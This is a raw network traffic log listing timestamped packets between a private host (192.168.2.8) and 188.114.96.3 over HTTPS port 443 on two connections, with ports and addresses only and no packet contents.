Sep 30, 2024 18:25:30.578303099 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.578330040 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.578435898 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.578460932 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.578499079 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.578603029 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.578618050 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.578650951 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.578659058 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.578677893 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.578696012 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.579098940 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.579113960 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.579153061 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.579161882 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.579194069 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.579701900 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.579719067 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.579761028 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.579768896 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.579807043 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.580152035 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.580171108 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.580205917 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.580212116 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.580238104 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.580254078 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.580404997 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.580429077 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.580460072 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.580466032 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.580486059 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.580504894 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.581895113 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.581909895 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.581954956 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.581964970 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.581998110 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.582928896 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.582942963 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.582981110 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.582997084 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.583026886 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.666656971 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.666699886 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.666784048 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.666806936 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.666840076 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.666857958 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.667411089 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.667434931 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.667459965 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.667465925 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.667494059 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.667570114 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.667989016 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.668008089 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.668035030 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.668041945 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.668064117 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.668081999 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.668486118 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.668502092 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.668530941 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.668536901 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.668548107 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.668557882 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.668576002 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.668581009 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.668591022 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.668603897 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.668647051 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.670017958 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.670038939 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.670068026 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.670074940 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.670093060 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.670113087 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.670362949 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.670377970 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.670420885 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.670428038 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.670458078 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.670691013 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.753922939 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.753948927 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.754065990 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.754097939 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.754115105 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.754134893 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.754152060 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.754162073 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.754172087 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.754205942 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.754690886 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.754708052 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.754760027 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.754766941 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.754807949 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.755059958 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.755078077 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.755121946 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.755130053 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.755167961 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.755561113 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.755577087 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.755626917 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.755633116 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.755675077 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.755943060 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.755963087 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.755995989 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.756001949 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.756021023 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.756042957 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.757129908 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.757148027 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.757196903 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.757204056 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.757241964 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.758097887 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.758115053 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.758162022 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.758167982 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.758205891 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.841738939 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.841769934 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.841885090 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.841918945 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.841959000 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.842051983 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.842104912 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.842111111 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.842142105 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.842183113 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.850503922 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.850539923 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.234647989 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.234709978 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.234772921 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.241955996 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.241987944 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.706728935 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.706789970 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.708324909 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.708336115 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.708622932 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.711673975 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.755394936 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.844955921 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.845004082 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.845033884 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.845047951 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.845061064 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.845072985 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.845089912 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.845114946 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.845145941 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.845158100 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.845417976 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.845444918 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.845453978 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.845464945 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.845491886 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.845496893 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.891081095 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.891109943 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.931446075 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.931488037 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.931504011 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.931514978 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.931526899 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.931550026 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.931572914 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.931597948 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.931606054 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.931619883 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.931653976 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.932619095 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.932667971 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.932693958 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.932698011 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.932708025 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.932738066 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.932743073 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.932784081 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.932811022 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.932816029 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.933573961 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.933600903 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.933614969 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.933620930 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.933667898 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.933725119 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.934362888 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.934390068 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.934402943 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.934408903 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.934436083 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.934437990 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.934448004 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.934484959 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.934490919 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:31.980940104 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:31.980961084 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.019129992 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.019165039 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.019181967 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.019196987 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.019236088 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.019248009 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.019257069 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.019287109 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.019290924 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.019299030 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.019323111 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.019404888 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.019445896 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.019452095 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.019484997 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.019490004 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.019689083 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.019732952 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.019737959 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.019764900 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.019846916 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.019893885 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.020095110 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.020140886 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.020379066 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.020421028 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.020524979 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.020582914 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.020592928 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.020629883 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.020673990 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.020713091 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.021219015 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.021265030 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.021367073 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.021410942 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.021501064 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.021542072 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.021553040 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.021594048 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.105954885 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.105995893 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.106019020 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.106031895 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.106041908 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.106070995 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.106086969 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.106121063 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.106129885 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.106170893 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.106195927 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.106235981 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.106551886 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.106607914 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.106679916 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.106731892 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.106803894 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.106848955 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.107059956 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.107122898 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.107161999 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.107206106 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.107268095 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.107328892 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.107640982 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.107693911 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.107755899 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.107800007 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.107980967 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.108010054 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.108035088 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.108040094 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.108052015 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.108062029 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.108083010 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.108099937 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.108685017 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.108720064 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.108799934 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.108799934 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.108808041 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.108839989 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.108882904 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.108889103 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.108899117 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.108931065 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.108957052 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.108973026 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.108979940 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.108990908 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.109613895 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.109668970 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.109675884 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.109752893 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.109756947 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.109764099 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.109814882 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.109961033 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.109994888 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.110011101 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.110016108 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.110028028 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.110043049 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.110079050 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.110083103 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.110131025 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.362101078 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.362117052 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.362155914 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.362180948 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.362196922 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.362214088 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.362325907 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.362345934 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.362375021 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.362380981 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.362404108 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.362864971 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.362881899 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.362922907 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.362935066 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.363279104 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.363301992 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.363338947 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.363344908 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.363367081 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.363487005 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.363502026 CEST	443	49709	188.114.96.3	192.168.2.8
